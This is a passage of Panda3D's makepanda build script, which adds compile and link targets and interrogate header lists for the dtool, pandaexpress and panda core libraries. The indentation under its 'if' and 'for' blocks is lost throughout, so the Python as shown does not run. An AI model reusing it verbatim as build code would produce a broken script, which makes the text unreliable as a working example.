TargetAdd('p3dtoolbase_composite1.obj', opts=OPTS, input='p3dtoolbase_composite1.cxx')
TargetAdd('p3dtoolbase_composite2.obj', opts=OPTS, input='p3dtoolbase_composite2.cxx')
TargetAdd('p3dtoolbase_lookup3.obj', opts=OPTS, input='lookup3.c')
TargetAdd('p3dtoolbase_indent.obj', opts=OPTS, input='indent.cxx')
#
# DIRECTORY: dtool/src/dtoolutil/
#
OPTS=['DIR:dtool/src/dtoolutil', 'BUILDING:DTOOL']
TargetAdd('p3dtoolutil_composite1.obj', opts=OPTS, input='p3dtoolutil_composite1.cxx')
TargetAdd('p3dtoolutil_composite2.obj', opts=OPTS, input='p3dtoolutil_composite2.cxx')
if GetTarget() == 'darwin':
TargetAdd('p3dtoolutil_filename_assist.obj', opts=OPTS, input='filename_assist.mm')
#
# DIRECTORY: dtool/metalibs/dtool/
#
OPTS=['DIR:dtool/metalibs/dtool', 'BUILDING:DTOOL']
TargetAdd('p3dtool_dtool.obj', opts=OPTS, input='dtool.cxx')
TargetAdd('libp3dtool.dll', input='p3dtool_dtool.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolutil_composite1.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolutil_composite2.obj')
if GetTarget() == 'darwin':
TargetAdd('libp3dtool.dll', input='p3dtoolutil_filename_assist.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_composite1.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_composite2.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_indent.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_lookup3.obj')
TargetAdd('libp3dtool.dll', opts=['ADVAPI','WINSHELL','WINKERNEL'])
#
# DIRECTORY: dtool/src/cppparser/
#
if (not RUNTIME):
OPTS=['DIR:dtool/src/cppparser', 'BISONPREFIX_cppyy']
CreateFile(GetOutputDir()+"/include/cppBison.h")
TargetAdd('p3cppParser_cppBison.obj', opts=OPTS, input='cppBison.yxx')
TargetAdd('cppBison.h', input='p3cppParser_cppBison.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3cppParser_composite1.obj', opts=OPTS, input='p3cppParser_composite1.cxx')
TargetAdd('p3cppParser_composite2.obj', opts=OPTS, input='p3cppParser_composite2.cxx')
TargetAdd('libp3cppParser.ilb', input='p3cppParser_composite1.obj')
TargetAdd('libp3cppParser.ilb', input='p3cppParser_composite2.obj')
TargetAdd('libp3cppParser.ilb', input='p3cppParser_cppBison.obj')
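    # NOTE: cppBison.h is pre-created empty (via CreateFile above) and registered
    # as a DEPENDENCYONLY target, presumably so other targets can declare a
    # dependency on the bison-generated header before it actually exists.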
#
# DIRECTORY: dtool/src/prc/
#
OPTS=['DIR:dtool/src/prc', 'BUILDING:DTOOLCONFIG', 'OPENSSL']
TargetAdd('p3prc_composite1.obj', opts=OPTS, input='p3prc_composite1.cxx')
TargetAdd('p3prc_composite2.obj', opts=OPTS, input='p3prc_composite2.cxx')
#
# DIRECTORY: dtool/src/dconfig/
#
OPTS=['DIR:dtool/src/dconfig', 'BUILDING:DTOOLCONFIG']
TargetAdd('p3dconfig_composite1.obj', opts=OPTS, input='p3dconfig_composite1.cxx')
#
# DIRECTORY: dtool/metalibs/dtoolconfig/
#
OPTS=['DIR:dtool/metalibs/dtoolconfig', 'BUILDING:DTOOLCONFIG']
TargetAdd('p3dtoolconfig_dtoolconfig.obj', opts=OPTS, input='dtoolconfig.cxx')
TargetAdd('libp3dtoolconfig.dll', input='p3dtoolconfig_dtoolconfig.obj')
TargetAdd('libp3dtoolconfig.dll', input='p3dconfig_composite1.obj')
TargetAdd('libp3dtoolconfig.dll', input='p3prc_composite1.obj')
TargetAdd('libp3dtoolconfig.dll', input='p3prc_composite2.obj')
TargetAdd('libp3dtoolconfig.dll', input='libp3dtool.dll')
TargetAdd('libp3dtoolconfig.dll', opts=['ADVAPI', 'OPENSSL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: dtool/src/interrogatedb/
#
OPTS=['DIR:dtool/src/interrogatedb', 'BUILDING:INTERROGATEDB', 'PYTHON']
TargetAdd('p3interrogatedb_composite1.obj', opts=OPTS, input='p3interrogatedb_composite1.cxx')
TargetAdd('p3interrogatedb_composite2.obj', opts=OPTS, input='p3interrogatedb_composite2.cxx')
TargetAdd('libp3interrogatedb.dll', input='p3interrogatedb_composite1.obj')
TargetAdd('libp3interrogatedb.dll', input='p3interrogatedb_composite2.obj')
TargetAdd('libp3interrogatedb.dll', input='libp3dtool.dll')
TargetAdd('libp3interrogatedb.dll', input='libp3dtoolconfig.dll')
TargetAdd('libp3interrogatedb.dll', opts=['PYTHON'])
if not PkgSkip("PYTHON"):
# This used to be called dtoolconfig.pyd, but it just contains the interrogatedb
# stuff, so it has been renamed appropriately.
OPTS=['DIR:dtool/metalibs/dtoolconfig', 'PYTHON']
TargetAdd('interrogatedb_pydtool.obj', opts=OPTS, input="pydtool.cxx")
TargetAdd('interrogatedb.pyd', input='interrogatedb_pydtool.obj')
TargetAdd('interrogatedb.pyd', input='libp3dtool.dll')
TargetAdd('interrogatedb.pyd', input='libp3dtoolconfig.dll')
TargetAdd('interrogatedb.pyd', input='libp3interrogatedb.dll')
TargetAdd('interrogatedb.pyd', opts=['PYTHON'])
#
# DIRECTORY: dtool/src/pystub/
#
if not RUNTIME and not RTDIST:
OPTS=['DIR:dtool/src/pystub']
TargetAdd('p3pystub_pystub.obj', opts=OPTS, input='pystub.cxx')
TargetAdd('libp3pystub.lib', input='p3pystub_pystub.obj')
#TargetAdd('libp3pystub.lib', input='libp3dtool.dll')
TargetAdd('libp3pystub.lib', opts=['ADVAPI'])
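    # libp3pystub supplies stub Python symbols so the command-line tools built
    # below can link against Python-aware libraries without a real interpreter.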
#
# DIRECTORY: dtool/src/interrogate/
#
if (not RUNTIME):
OPTS=['DIR:dtool/src/interrogate', 'DIR:dtool/src/cppparser', 'DIR:dtool/src/interrogatedb']
TargetAdd('interrogate_composite1.obj', opts=OPTS, input='interrogate_composite1.cxx')
TargetAdd('interrogate_composite2.obj', opts=OPTS, input='interrogate_composite2.cxx')
TargetAdd('interrogate.exe', input='interrogate_composite1.obj')
TargetAdd('interrogate.exe', input='interrogate_composite2.obj')
TargetAdd('interrogate.exe', input='libp3cppParser.ilb')
TargetAdd('interrogate.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('interrogate.exe', input='libp3interrogatedb.dll')
TargetAdd('interrogate.exe', input='libp3pystub.lib')
TargetAdd('interrogate.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
TargetAdd('interrogate_module_interrogate_module.obj', opts=OPTS, input='interrogate_module.cxx')
TargetAdd('interrogate_module.exe', input='interrogate_module_interrogate_module.obj')
TargetAdd('interrogate_module.exe', input='libp3cppParser.ilb')
TargetAdd('interrogate_module.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('interrogate_module.exe', input='libp3interrogatedb.dll')
TargetAdd('interrogate_module.exe', input='libp3pystub.lib')
TargetAdd('interrogate_module.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
if (not RTDIST):
TargetAdd('parse_file_parse_file.obj', opts=OPTS, input='parse_file.cxx')
TargetAdd('parse_file.exe', input='parse_file_parse_file.obj')
TargetAdd('parse_file.exe', input='libp3cppParser.ilb')
TargetAdd('parse_file.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('parse_file.exe', input='libp3interrogatedb.dll')
TargetAdd('parse_file.exe', input='libp3pystub.lib')
TargetAdd('parse_file.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
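    # interrogate.exe generates C++ binding code from the scanned headers,
    # interrogate_module.exe emits the module stub that ties a set of
    # interrogate databases together, and parse_file.exe is a standalone
    # driver for the C++ parser.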
#
# DIRECTORY: dtool/src/prckeys/
#
if (PkgSkip("OPENSSL")==0 and not RUNTIME and not RTDIST):
OPTS=['DIR:dtool/src/prckeys', 'OPENSSL']
TargetAdd('make-prc-key_makePrcKey.obj', opts=OPTS, input='makePrcKey.cxx')
TargetAdd('make-prc-key.exe', input='make-prc-key_makePrcKey.obj')
TargetAdd('make-prc-key.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('make-prc-key.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: dtool/src/test_interrogate/
#
if (not RTDIST and not RUNTIME):
OPTS=['DIR:dtool/src/test_interrogate']
TargetAdd('test_interrogate_test_interrogate.obj', opts=OPTS, input='test_interrogate.cxx')
TargetAdd('test_interrogate.exe', input='test_interrogate_test_interrogate.obj')
TargetAdd('test_interrogate.exe', input='libp3interrogatedb.dll')
TargetAdd('test_interrogate.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('test_interrogate.exe', input='libp3pystub.lib')
TargetAdd('test_interrogate.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: dtool/src/dtoolbase/
#
OPTS=['DIR:dtool/src/dtoolbase', 'PYTHON']
IGATEFILES=GetDirectoryContents('dtool/src/dtoolbase', ["*_composite*.cxx"])
IGATEFILES += [
"typeHandle.h",
"typeHandle_ext.h",
"typeRegistry.h",
"typedObject.h",
"neverFreeMemory.h",
]
TargetAdd('libp3dtoolbase.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dtoolbase.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dtoolbase', 'SRCDIR:dtool/src/dtoolbase'])
TargetAdd('libp3dtoolbase_igate.obj', input='libp3dtoolbase.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3dtoolbase_typeHandle_ext.obj', opts=OPTS, input='typeHandle_ext.cxx')
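# NOTE: the pattern above repeats for each directory below: interrogate scans
# IGATEFILES into a libp3<name>.in database, the generated binding code is
# compiled as libp3<name>_igate.obj, and the .in databases are later merged
# into core_module.obj and linked, together with the _igate objects, into the
# panda3d.core extension (core.pyd).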
#
# DIRECTORY: dtool/src/dtoolutil/
#
OPTS=['DIR:dtool/src/dtoolutil', 'PYTHON']
IGATEFILES=GetDirectoryContents('dtool/src/dtoolutil', ["*_composite*.cxx"])
IGATEFILES += [
"config_dtoolutil.h",
"pandaSystem.h",
"dSearchPath.h",
"executionEnvironment.h",
"textEncoder.h",
"filename.h",
"filename_ext.h",
"globPattern.h",
"globPattern_ext.h",
"pandaFileStream.h",
"lineStream.h",
]
TargetAdd('libp3dtoolutil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dtoolutil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dtoolutil', 'SRCDIR:dtool/src/dtoolutil'])
TargetAdd('libp3dtoolutil_igate.obj', input='libp3dtoolutil.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3dtoolutil_ext_composite.obj', opts=OPTS, input='p3dtoolutil_ext_composite.cxx')
#
# DIRECTORY: dtool/src/prc/
#
OPTS=['DIR:dtool/src/prc', 'PYTHON']
IGATEFILES=GetDirectoryContents('dtool/src/prc', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3prc.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3prc.in', opts=['IMOD:panda3d.core', 'ILIB:libp3prc', 'SRCDIR:dtool/src/prc'])
TargetAdd('libp3prc_igate.obj', input='libp3prc.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3prc_ext_composite.obj', opts=OPTS, input='p3prc_ext_composite.cxx')
#
# DIRECTORY: panda/src/pandabase/
#
OPTS=['DIR:panda/src/pandabase', 'BUILDING:PANDAEXPRESS']
TargetAdd('p3pandabase_pandabase.obj', opts=OPTS, input='pandabase.cxx')
#
# DIRECTORY: panda/src/express/
#
OPTS=['DIR:panda/src/express', 'BUILDING:PANDAEXPRESS', 'OPENSSL', 'ZLIB']
TargetAdd('p3express_composite1.obj', opts=OPTS, input='p3express_composite1.cxx')
TargetAdd('p3express_composite2.obj', opts=OPTS, input='p3express_composite2.cxx')
OPTS=['DIR:panda/src/express', 'OPENSSL', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/express', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3express.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3express.in', opts=['IMOD:panda3d.core', 'ILIB:libp3express', 'SRCDIR:panda/src/express'])
TargetAdd('libp3express_igate.obj', input='libp3express.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3express_ext_composite.obj', opts=OPTS, input='p3express_ext_composite.cxx')
#
# DIRECTORY: panda/src/downloader/
#
OPTS=['DIR:panda/src/downloader', 'BUILDING:PANDAEXPRESS', 'OPENSSL', 'ZLIB']
TargetAdd('p3downloader_composite1.obj', opts=OPTS, input='p3downloader_composite1.cxx')
TargetAdd('p3downloader_composite2.obj', opts=OPTS, input='p3downloader_composite2.cxx')
OPTS=['DIR:panda/src/downloader', 'OPENSSL', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/downloader', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3downloader.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3downloader.in', opts=['IMOD:panda3d.core', 'ILIB:libp3downloader', 'SRCDIR:panda/src/downloader'])
TargetAdd('libp3downloader_igate.obj', input='libp3downloader.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3downloader_stringStream_ext.obj', opts=OPTS, input='stringStream_ext.cxx')
#
# DIRECTORY: panda/metalibs/pandaexpress/
#
OPTS=['DIR:panda/metalibs/pandaexpress', 'BUILDING:PANDAEXPRESS', 'ZLIB']
TargetAdd('pandaexpress_pandaexpress.obj', opts=OPTS, input='pandaexpress.cxx')
TargetAdd('libpandaexpress.dll', input='pandaexpress_pandaexpress.obj')
TargetAdd('libpandaexpress.dll', input='p3downloader_composite1.obj')
TargetAdd('libpandaexpress.dll', input='p3downloader_composite2.obj')
TargetAdd('libpandaexpress.dll', input='p3express_composite1.obj')
TargetAdd('libpandaexpress.dll', input='p3express_composite2.obj')
TargetAdd('libpandaexpress.dll', input='p3pandabase_pandabase.obj')
TargetAdd('libpandaexpress.dll', input=COMMON_DTOOL_LIBS)
TargetAdd('libpandaexpress.dll', opts=['ADVAPI', 'WINSOCK2', 'OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'ANDROID'])
#
# DIRECTORY: panda/src/pipeline/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pipeline', 'BUILDING:PANDA']
TargetAdd('p3pipeline_composite1.obj', opts=OPTS, input='p3pipeline_composite1.cxx')
TargetAdd('p3pipeline_composite2.obj', opts=OPTS, input='p3pipeline_composite2.cxx')
TargetAdd('p3pipeline_contextSwitch.obj', opts=OPTS, input='contextSwitch.c')
OPTS=['DIR:panda/src/pipeline', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pipeline', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pipeline.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pipeline.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pipeline', 'SRCDIR:panda/src/pipeline'])
TargetAdd('libp3pipeline_igate.obj', input='libp3pipeline.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3pipeline_pythonThread.obj', opts=OPTS, input='pythonThread.cxx')
#
# DIRECTORY: panda/src/linmath/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/linmath', 'BUILDING:PANDA']
TargetAdd('p3linmath_composite1.obj', opts=OPTS, input='p3linmath_composite1.cxx')
TargetAdd('p3linmath_composite2.obj', opts=OPTS, input='p3linmath_composite2.cxx')
OPTS=['DIR:panda/src/linmath', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/linmath', ["*.h", "*_composite*.cxx"])
for ifile in IGATEFILES[:]:
if "_src." in ifile:
IGATEFILES.remove(ifile)
IGATEFILES.remove('cast_to_double.h')
IGATEFILES.remove('lmat_ops.h')
IGATEFILES.remove('cast_to_float.h')
TargetAdd('libp3linmath.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3linmath.in', opts=['IMOD:panda3d.core', 'ILIB:libp3linmath', 'SRCDIR:panda/src/linmath'])
TargetAdd('libp3linmath_igate.obj', input='libp3linmath.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/putil/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/putil', 'BUILDING:PANDA', 'ZLIB']
TargetAdd('p3putil_composite1.obj', opts=OPTS, input='p3putil_composite1.cxx')
TargetAdd('p3putil_composite2.obj', opts=OPTS, input='p3putil_composite2.cxx')
OPTS=['DIR:panda/src/putil', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/putil', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("test_bam.h")
IGATEFILES.remove("config_util.h")
TargetAdd('libp3putil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3putil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3putil', 'SRCDIR:panda/src/putil'])
TargetAdd('libp3putil_igate.obj', input='libp3putil.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3putil_ext_composite.obj', opts=OPTS, input='p3putil_ext_composite.cxx')
#
# DIRECTORY: panda/src/audio/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/audio', 'BUILDING:PANDA']
TargetAdd('p3audio_composite1.obj', opts=OPTS, input='p3audio_composite1.cxx')
OPTS=['DIR:panda/src/audio', 'PYTHON']
IGATEFILES=["audio.h"]
TargetAdd('libp3audio.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3audio.in', opts=['IMOD:panda3d.core', 'ILIB:libp3audio', 'SRCDIR:panda/src/audio'])
TargetAdd('libp3audio_igate.obj', input='libp3audio.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/event/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/event', 'BUILDING:PANDA']
TargetAdd('p3event_composite1.obj', opts=OPTS, input='p3event_composite1.cxx')
TargetAdd('p3event_composite2.obj', opts=OPTS, input='p3event_composite2.cxx')
OPTS=['DIR:panda/src/event', 'PYTHON']
TargetAdd('p3event_asyncFuture_ext.obj', opts=OPTS, input='asyncFuture_ext.cxx')
TargetAdd('p3event_pythonTask.obj', opts=OPTS, input='pythonTask.cxx')
IGATEFILES=GetDirectoryContents('panda/src/event', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3event.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3event.in', opts=['IMOD:panda3d.core', 'ILIB:libp3event', 'SRCDIR:panda/src/event'])
TargetAdd('libp3event_igate.obj', input='libp3event.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/mathutil/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/mathutil', 'BUILDING:PANDA', 'FFTW']
TargetAdd('p3mathutil_composite1.obj', opts=OPTS, input='p3mathutil_composite1.cxx')
TargetAdd('p3mathutil_composite2.obj', opts=OPTS, input='p3mathutil_composite2.cxx')
OPTS=['DIR:panda/src/mathutil', 'FFTW', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/mathutil', ["*.h", "*_composite*.cxx"])
for ifile in IGATEFILES[:]:
if "_src." in ifile:
IGATEFILES.remove(ifile)
TargetAdd('libp3mathutil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3mathutil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3mathutil', 'SRCDIR:panda/src/mathutil'])
TargetAdd('libp3mathutil_igate.obj', input='libp3mathutil.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/gsgbase/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/gsgbase', 'BUILDING:PANDA']
TargetAdd('p3gsgbase_composite1.obj', opts=OPTS, input='p3gsgbase_composite1.cxx')
OPTS=['DIR:panda/src/gsgbase', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/gsgbase', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3gsgbase.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3gsgbase.in', opts=['IMOD:panda3d.core', 'ILIB:libp3gsgbase', 'SRCDIR:panda/src/gsgbase'])
TargetAdd('libp3gsgbase_igate.obj', input='libp3gsgbase.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pnmimage/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pnmimage', 'BUILDING:PANDA', 'ZLIB']
TargetAdd('p3pnmimage_composite1.obj', opts=OPTS, input='p3pnmimage_composite1.cxx')
TargetAdd('p3pnmimage_composite2.obj', opts=OPTS, input='p3pnmimage_composite2.cxx')
TargetAdd('p3pnmimage_convert_srgb_sse2.obj', opts=OPTS+['SSE2'], input='convert_srgb_sse2.cxx')
OPTS=['DIR:panda/src/pnmimage', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pnmimage', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pnmimage.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pnmimage.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pnmimage', 'SRCDIR:panda/src/pnmimage'])
TargetAdd('libp3pnmimage_igate.obj', input='libp3pnmimage.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3pnmimage_pfmFile_ext.obj', opts=OPTS, input='pfmFile_ext.cxx')
#
# DIRECTORY: panda/src/nativenet/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/nativenet', 'OPENSSL', 'BUILDING:PANDA']
TargetAdd('p3nativenet_composite1.obj', opts=OPTS, input='p3nativenet_composite1.cxx')
OPTS=['DIR:panda/src/nativenet', 'OPENSSL', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/nativenet', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3nativenet.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3nativenet.in', opts=['IMOD:panda3d.core', 'ILIB:libp3nativenet', 'SRCDIR:panda/src/nativenet'])
TargetAdd('libp3nativenet_igate.obj', input='libp3nativenet.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/net/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/net', 'BUILDING:PANDA']
TargetAdd('p3net_composite1.obj', opts=OPTS, input='p3net_composite1.cxx')
TargetAdd('p3net_composite2.obj', opts=OPTS, input='p3net_composite2.cxx')
OPTS=['DIR:panda/src/net', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/net', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("datagram_ui.h")
TargetAdd('libp3net.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3net.in', opts=['IMOD:panda3d.core', 'ILIB:libp3net', 'SRCDIR:panda/src/net'])
TargetAdd('libp3net_igate.obj', input='libp3net.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pstatclient/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pstatclient', 'BUILDING:PANDA']
TargetAdd('p3pstatclient_composite1.obj', opts=OPTS, input='p3pstatclient_composite1.cxx')
TargetAdd('p3pstatclient_composite2.obj', opts=OPTS, input='p3pstatclient_composite2.cxx')
OPTS=['DIR:panda/src/pstatclient', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pstatclient', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("config_pstats.h")
TargetAdd('libp3pstatclient.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pstatclient.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pstatclient', 'SRCDIR:panda/src/pstatclient'])
TargetAdd('libp3pstatclient_igate.obj', input='libp3pstatclient.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/gobj/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/gobj', 'BUILDING:PANDA', 'NVIDIACG', 'ZLIB', 'SQUISH']
TargetAdd('p3gobj_composite1.obj', opts=OPTS, input='p3gobj_composite1.cxx')
TargetAdd('p3gobj_composite2.obj', opts=OPTS, input='p3gobj_composite2.cxx')
OPTS=['DIR:panda/src/gobj', 'NVIDIACG', 'ZLIB', 'SQUISH', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/gobj', ["*.h", "*_composite*.cxx"])
if ("cgfx_states.h" in IGATEFILES): IGATEFILES.remove("cgfx_states.h")
TargetAdd('libp3gobj.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3gobj.in', opts=['IMOD:panda3d.core', 'ILIB:libp3gobj', 'SRCDIR:panda/src/gobj'])
TargetAdd('libp3gobj_igate.obj', input='libp3gobj.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3gobj_ext_composite.obj', opts=OPTS, input='p3gobj_ext_composite.cxx')
#
# DIRECTORY: panda/src/pgraphnodes/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pgraphnodes', 'BUILDING:PANDA']
TargetAdd('p3pgraphnodes_composite1.obj', opts=OPTS, input='p3pgraphnodes_composite1.cxx')
TargetAdd('p3pgraphnodes_composite2.obj', opts=OPTS, input='p3pgraphnodes_composite2.cxx')
OPTS=['DIR:panda/src/pgraphnodes', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pgraphnodes', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pgraphnodes.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pgraphnodes.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pgraphnodes', 'SRCDIR:panda/src/pgraphnodes'])
TargetAdd('libp3pgraphnodes_igate.obj', input='libp3pgraphnodes.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pgraph/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pgraph', 'BUILDING:PANDA']
TargetAdd('p3pgraph_nodePath.obj', opts=OPTS, input='nodePath.cxx')
TargetAdd('p3pgraph_composite1.obj', opts=OPTS, input='p3pgraph_composite1.cxx')
TargetAdd('p3pgraph_composite2.obj', opts=OPTS, input='p3pgraph_composite2.cxx')
TargetAdd('p3pgraph_composite3.obj', opts=OPTS, input='p3pgraph_composite3.cxx')
TargetAdd('p3pgraph_composite4.obj', opts=OPTS, input='p3pgraph_composite4.cxx')
OPTS=['DIR:panda/src/pgraph', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pgraph', ["*.h", "nodePath.cxx", "*_composite*.cxx"])
TargetAdd('libp3pgraph.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pgraph.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pgraph', 'SRCDIR:panda/src/pgraph'])
TargetAdd('libp3pgraph_igate.obj', input='libp3pgraph.in', opts=["DEPENDENCYONLY","BIGOBJ"])
TargetAdd('p3pgraph_ext_composite.obj', opts=OPTS, input='p3pgraph_ext_composite.cxx')
#
# DIRECTORY: panda/src/cull/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/cull', 'BUILDING:PANDA']
TargetAdd('p3cull_composite1.obj', opts=OPTS, input='p3cull_composite1.cxx')
TargetAdd('p3cull_composite2.obj', opts=OPTS, input='p3cull_composite2.cxx')
OPTS=['DIR:panda/src/cull', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/cull', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3cull.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3cull.in', opts=['IMOD:panda3d.core', 'ILIB:libp3cull', 'SRCDIR:panda/src/cull'])
TargetAdd('libp3cull_igate.obj', input='libp3cull.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/chan/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/chan', 'BUILDING:PANDA']
TargetAdd('p3chan_composite1.obj', opts=OPTS, input='p3chan_composite1.cxx')
TargetAdd('p3chan_composite2.obj', opts=OPTS, input='p3chan_composite2.cxx')
OPTS=['DIR:panda/src/chan', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/chan', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove('movingPart.h')
IGATEFILES.remove('animChannelFixed.h')
TargetAdd('libp3chan.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3chan.in', opts=['IMOD:panda3d.core', 'ILIB:libp3chan', 'SRCDIR:panda/src/chan'])
TargetAdd('libp3chan_igate.obj', input='libp3chan.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/char/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/char', 'BUILDING:PANDA']
TargetAdd('p3char_composite1.obj', opts=OPTS, input='p3char_composite1.cxx')
TargetAdd('p3char_composite2.obj', opts=OPTS, input='p3char_composite2.cxx')
OPTS=['DIR:panda/src/char', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/char', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3char.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3char.in', opts=['IMOD:panda3d.core', 'ILIB:libp3char', 'SRCDIR:panda/src/char'])
TargetAdd('libp3char_igate.obj', input='libp3char.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/dgraph/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/dgraph', 'BUILDING:PANDA']
TargetAdd('p3dgraph_composite1.obj', opts=OPTS, input='p3dgraph_composite1.cxx')
TargetAdd('p3dgraph_composite2.obj', opts=OPTS, input='p3dgraph_composite2.cxx')
OPTS=['DIR:panda/src/dgraph', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/dgraph', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3dgraph.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dgraph.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dgraph', 'SRCDIR:panda/src/dgraph'])
